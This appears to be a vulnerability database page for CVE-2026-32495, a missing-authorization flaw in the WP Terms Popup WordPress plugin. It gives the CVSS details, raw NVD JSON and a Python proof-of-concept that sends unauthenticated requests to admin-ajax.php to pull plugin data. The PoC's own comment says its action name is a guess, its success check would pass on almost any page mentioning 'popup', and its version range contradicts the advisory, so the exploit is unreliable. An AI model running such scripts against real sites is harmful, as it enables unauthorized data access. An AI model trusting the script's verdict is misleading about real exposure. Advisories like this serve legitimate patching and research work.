Security Vulnerability Report
中文
CVE-2026-32495 CVSS 7.5 HIGH

CVE-2026-32495

Published: 2026-03-25 17:17:01
Last Modified: 2026-04-24 16:35:20

Description

Missing Authorization vulnerability in Link Software LLC WP Terms Popup wp-terms-popup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Terms Popup: from n/a through <= 2.10.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Terms Popup <= 2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: WP Terms Popup < 2.10.0 - Missing Authorization PoC # Date: 2026-03-25 # CVE: CVE-2026-32495 import requests def check_vulnerability(target_url): """Checks if the target is vulnerable to CVE-2026-32495.""" # The vulnerable endpoint is typically an AJAX action ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload to exploit missing authorization on a restricted action # Note: The specific 'action' parameter depends on the plugin's internal code payload = { "action": "wp_terms_popup_get_data", "param": "export_all" } try: # Send request without authentication cookies response = requests.get(ajax_url, params=payload, timeout=10) if response.status_code == 200: # Check if response contains sensitive data or admin-only JSON if "settings" in response.text or "popup" in response.text: print("[+] Vulnerability Confirmed! Sensitive data leaked.") print(f"[+] Response: {response.text[:200]}") return True else: print("[-] Target does not appear to be vulnerable.") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with target URL check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32495", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:01.247", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Link Software LLC WP Terms Popup wp-terms-popup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Terms Popup: from n/a through <= 2.10.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Link Software LLC WP Terms Popup wp-terms-popup permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP Terms Popup: desde n/a hasta &lt;= 2.10.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-terms-popup/vulnerability/wordpress-wp-terms-popup-plugin-2-10-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}